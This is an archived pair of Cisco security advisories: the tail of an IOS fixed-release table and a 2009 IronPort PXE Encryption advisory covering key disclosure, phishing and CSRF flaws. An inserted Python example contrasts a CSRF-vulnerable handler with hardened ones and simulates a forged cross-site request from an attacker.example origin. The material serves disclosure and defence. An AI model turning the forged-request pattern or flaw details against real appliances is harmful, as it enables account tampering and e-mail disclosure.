|------------+-------------+-------------|
| 12.2SVC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SW | first fixed | 12.4(15)T8 |
| | in 12.4SW | |
|------------+-------------+-------------|
| 12.2SX | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXF | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXH | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SXI | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.2SY | first fixed | S1212.2(33) |
| | in 12.2SB | SB3 |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.2SZ | first fixed | S1212.2(33) |
| | in 12.2SB | SB3 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2T | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2TPC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2XF | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XG | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XI | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XJ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XK | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XL | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XM | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | | 12.2(20) |
| | | S1212.2(33) |
| | | SB312.2(33) |
| 12.2XN | 12.2(33)XN1 | SRC312.2 |
| | | (33) |
| | | XNA212.2 |
| | | (33r)SRD2 |
|------------+-------------+-------------|
| 12.2XNA | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2XNB | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | 12.2(46)XO; | 12.2(46)XO; |
| 12.2XO | Available | Available |
| | on | on |
| | 02-FEB-2009 | 02-FEB-2009 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XQ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XS | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XT | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XU | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XV | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XW | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2YA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2YB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YF | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YG | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YH | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YJ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YK | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YL | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.2YM | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.2YN | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YO | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.2YP | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2YQ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YR | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YS | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2YT | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YU | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YV | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YW | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YX | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YY | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YZ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Releases | |
| | prior to | |
| | 12.2(13)ZC | |
| | are | |
| 12.2ZC | vulnerable, | |
| | release | |
| | 12.2(13)ZC | |
| | and later | |
| | are not | |
| | vulnerable; | |
|------------+-------------+-------------|
| 12.2ZD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.2ZE | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.2ZF | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.2ZG | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.2ZH | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2ZJ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZL | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZP | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2ZU | migrate to | |
| | any release | |
| | in 12.2SXH | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2ZX | first fixed | 12.2(33)SB3 |
| | in 12.2SB | |
|------------+-------------+-------------|
| 12.2ZY | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZYA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.3-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3 | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3B | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3BC | 12.3(23)BC6 | 12.3(23)BC6 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3BW | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3EU | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.3JA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JEA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JEB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JEC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3JK | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3JL | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JX | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3T | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3TPC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3VA | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XA | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.3XB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XC | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XD | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XE | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.3XF | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XG | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XI | first fixed | 12.2(33)SB3 |
| | in 12.2SB | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XJ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XK | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XL | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XQ | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XR | first fixed | 12.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XS | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XU | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3XW | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XX | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XY | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3XZ | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15)T8 |
| 12.3YA | first fixed | 12.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YD | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YF | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YG | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YH | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YI | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YJ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YK | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YM | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YQ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YS | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YT | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YU | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3YX | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3YZ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.3ZA | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.4-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| 12.4 | 12.4(16) | 12.4(23) |
|------------+-------------+-------------|
| 12.4JA | 12.4(16b)JA | 12.4(16b) |
| | | JA1 |
|------------+-------------+-------------|
| 12.4JDA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4JK | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4JL | 12.4(3)JL1 | 12.4(3)JL1 |
|------------+-------------+-------------|
| 12.4JMA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4JMB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(16b) |
| 12.4JX | first fixed | JA1 |
| | in 12.4JA | |
|------------+-------------+-------------|
| 12.4MD | 12.4(15)MD | 12.4(15)MD2 |
|------------+-------------+-------------|
| 12.4MR | 12.4(16)MR | |
|------------+-------------+-------------|
| 12.4SW | 12.4(11)SW3 | 12.4(15)T8 |
|------------+-------------+-------------|
| 12.4T | 12.4(15)T | 12.4(15)T8 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XA | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XB | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XC | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XD | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XE | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.4XF | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XG | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XJ | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XK | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.4XL | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XM | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XN | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XP | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.4XQ | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XR | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.4XT | first fixed | 12.4(15)T8 |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.4XV | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | | 12.4(11) |
| | | XW10; |
| 12.4XW | 12.4(11)XW3 | Available |
| | | on |
| | | 22-JAN-2009 |
|------------+-------------+-------------|
| 12.4XY | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4XZ | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.4YA | Not | |
| | Vulnerable | |
+----------------------------------------+
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkluC58ACgkQ86n/Gc8U/uA6vACfY36eBjbCbnJsrnJlOCE0Mr6Y
JqUAn1TVyUvBk8lGTm94F+tvmZy4n3Ke
=cGUi
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: IronPort Encryption Appliance / PostX and
PXE Encryption Vulnerabilities
Advisory ID: cisco-sa-20090114-ironport
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
IronPort PXE Encryption is an e-mail encryption solution that is
designed to secure e-mail communications without the need for a
Public Key Infrastructure (PKI) or special agents on receiving
systems. When an e-mail message is targeted for encryption, the PXE
encryption engine on an IronPort e-mail gateway encrypts the original
e-mail message as an HTML file and attaches it to a notification
e-mail message that is sent to the recipient. The per-message key
used to decrypt the HTML file attachment is stored on a local
IronPort Encryption Appliance, PostX software installation or the
Cisco Registered Envelope Service, which is a Cisco-managed software
service.
PXE Encryption Privacy Vulnerabilities
+-------------------------------------
The IronPort PXE Encryption solution is affected by two
vulnerabilities that could allow unauthorized individuals to view the
contents of secure e-mail messages. To exploit the vulnerabilities,
attackers must first intercept secure e-mail messages on the network
or via a compromised e-mail account.
IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------
IronPort Encryption Appliance devices contain two vulnerabilities
that could allow unauthorized users to gain access to the IronPort
Encryption Appliance administration interface and modify other users'
settings. These vulnerabilities do not affect Cisco Registered
Envelope Service users.
Cisco has released free software updates that address these
vulnerabilities. There are no workarounds for the vulnerabilities
that are described in this advisory.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml
Affected Products
=================
Vulnerable Products
+------------------
The following IronPort Encryption Appliance/PostX versions are
affected by these vulnerabilities:
* All PostX 6.2.1 versions prior to 6.2.1.1
* All PostX 6.2.2 versions prior to 6.2.2.3
* All IronPort Encryption Appliance/PostX 6.2.4 versions prior to 6.2.4.1.1
* All IronPort Encryption Appliance/PostX 6.2.5 versions
* All IronPort Encryption Appliance/PostX 6.2.6 versions
* All IronPort Encryption Appliance/PostX 6.2.7 versions prior to 6.2.7.7
* All IronPort Encryption Appliance 6.3 versions prior to 6.3.0.4
* All IronPort Encryption Appliance 6.5 versions prior to 6.5.0.2
The version of software that is running on an IronPort Encryption
Appliance is located on the About page of the IronPort Encryption
Appliance administration interface.
Note: Customers should contact IronPort support to determine which
software fixes are applicable for their environment. Please consult
the Obtaining Fixed Software section of this advisory for more
information.
Products Confirmed Not Vulnerable
+--------------------------------
IronPort C, M and S-Series appliances are not affected by these
vulnerabilities. Although C-Series appliances can be configured to
use a local IronPort Encryption Appliance for per-message key
retention, the C-Series appliances are not vulnerable. The Cisco
Registered Envelope Service is not vulnerable.
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Note: IronPort tracks bugs using an internal system that is not
available to customers. The IronPort bug tracking identifiers are
provided for reference only.
PXE Encryption Privacy Vulnerabilities
+-------------------------------------
Individual PXE Encryption users are exposed to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. Both vulnerabilities require the attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or through a compromised user e-mail account.
The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
message without user interaction. Using the decryption key, an
attacker could decrypt the contents of the secure e-mail message.
This vulnerability is documented in IronPort bug 8062 and has been
assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0053.
By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.
IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------
The administration interface of IronPort Encryption Appliance devices
contains a cross-site request forgery (CSRF) vulnerability that could
allow an attacker to modify a user's IronPort Encryption Appliance
preferences, including their user name and personal security pass
phrase, if the user is logged into the IronPort Encryption Appliance
administration interface. Exploitation of the vulnerability will not
allow an attacker to change a user's password. This vulnerability is
documented in IronPort bug 5806 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0055.
The administration interface of IronPort Encryption Appliance devices
also contains a cross-site request forgery (CSRF) vulnerability that
could allow an attacker to execute a command and modify a user's
IronPort Encryption Appliance preferences, including their user name
and personal security pass phrase, under certain circumstances when a
user logs out of the IronPort Encryption Appliance administration
interface. Exploitation of the vulnerability will not allow an
attacker to change a user's password. This vulnerability is
documented in IronPort bug 6403 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0056.
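The mechanism behind both CSRF findings above, shown as an added example that is not IronPort's or Cisco's code. The session layout, origin, parameter names (`sid`, `csrf_token`, `passphrase`) and handler names are constructed for illustration and say nothing about the appliance's real interface. The point it demonstrates: a browser attaches the session cookie to a POST regardless of which site produced the form, so a handler that checks only the cookie acts on a request submitted from an attacker's page; the hardened handlers require a per-session token a cross-site page cannot read, and treat logout as a state-changing action that needs the same proof.

```python
"""Preferences-update and logout handlers without and with CSRF protection.

Added example (not IronPort's code); every name below is constructed.
"""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://admin.example"   # constructed origin of the admin interface
SESSIONS = {}   # session id -> {"user": ..., "csrf_token": ..., "prefs": {...}}


@dataclass
class Request:
    method: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def login(user):
    """Start a session; the CSRF token is bound to it and rendered into every form."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32), "prefs": {}}
    return sid


def update_prefs_vulnerable(req):
    """Trusts the session cookie alone, so a forged cross-site POST is accepted."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if req.method != "POST" or session is None:
        return 403, "forbidden"
    session["prefs"].update(req.form)
    return 200, "updated"


def csrf_protected(handler):
    """Wrap a state-changing handler: POST only, Origin (when the browser sends
    one) must be ours, and the form must carry the session's token, compared
    in constant time so the check itself leaks nothing."""
    def guarded(req):
        session = SESSIONS.get(req.cookies.get("sid"))
        if req.method != "POST" or session is None:
            return 403, "forbidden"
        origin = req.headers.get("Origin")
        if origin is not None and origin != SITE_ORIGIN:
            return 403, "cross-site origin"
        submitted = req.form.get("csrf_token", "")
        if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
            return 403, "missing or wrong CSRF token"
        return handler(req, session)
    return guarded


@csrf_protected
def update_prefs_hardened(req, session):
    session["prefs"].update({k: v for k, v in req.form.items() if k != "csrf_token"})
    return 200, "updated"


@csrf_protected
def logout_hardened(req, session):
    """Logout changes state too; a forged logout must not be accepted either."""
    SESSIONS.pop(req.cookies["sid"])
    return 200, "logged out"


def forged_request(sid, fields):
    """What arrives when the victim's browser submits a form from an attacker's
    page: our cookie is attached automatically, but the attacker's page cannot
    read the token, so it is absent."""
    return Request("POST", cookies={"sid": sid}, form=dict(fields),
                   headers={"Origin": "https://attacker.example"})


def legit_request(sid, fields):
    """The same form submitted from our own page, token included."""
    form = dict(fields, csrf_token=SESSIONS[sid]["csrf_token"])
    return Request("POST", cookies={"sid": sid}, form=form, headers={"Origin": SITE_ORIGIN})


if __name__ == "__main__":
    victim = login("alice")
    print("vulnerable:", update_prefs_vulnerable(forged_request(victim, {"passphrase": "x"})))
    print("hardened:  ", update_prefs_hardened(forged_request(victim, {"passphrase": "x"})))
```

The Origin check alone is not enough (older clients omit the header, and a same-site XSS would pass it), which is why the token is mandatory and the origin check is an additional reject rule rather than the primary one.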
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062
CVSS Base Score - 7.1
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - None
Availability Impact - None
CVSS Temporal Score - 5.9
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
PXE Encryption Phishing Vulnerabilities - IronPort Bug 8149
CVSS Base Score - 6.1
Access Vector - Network
Access Complexity - High
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
IronPort Encryption Appliance CSRF Vulnerability - IronPort Bug 5806
CVSS Base Score - 5.8
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 4.8
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
IronPort Encryption Appliance Logout Action CSRF Vulnerability - IronPort Bug 6403
CVSS Base Score - 5.8
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 4.8
Exploitability - Functional
Remediation Level - Official Fix
Report Confidence - Confirmed
Impact
======
PXE Encryption Privacy Vulnerabilities
+-------------------------------------
Successful exploitation of these vulnerabilities could allow an
attacker to obtain user credentials and view the contents of
intercepted secure e-mail messages, which could result in the
disclosure of sensitive information.
IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------
Successful exploitation of these vulnerabilities could allow an
attacker to access user accounts on an IronPort Encryption Appliance
device, which could result in the modification of user preferences.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
Workarounds
===========
There are no workarounds for the vulnerabilities that are described
in this advisory.
There are mitigations available to help prevent exploitation of the
PXE Encryption phishing-style vulnerability. Phishing attacks can be
greatly reduced if DomainKeys Identified Mail (DKIM) and Sender
Policy Framework (SPF) are implemented on IronPort e-mail gateways to
help ensure message integrity and source origin. Additionally, the
PXE Encryption solution contains an anti-phishing Secure Pass Phrase
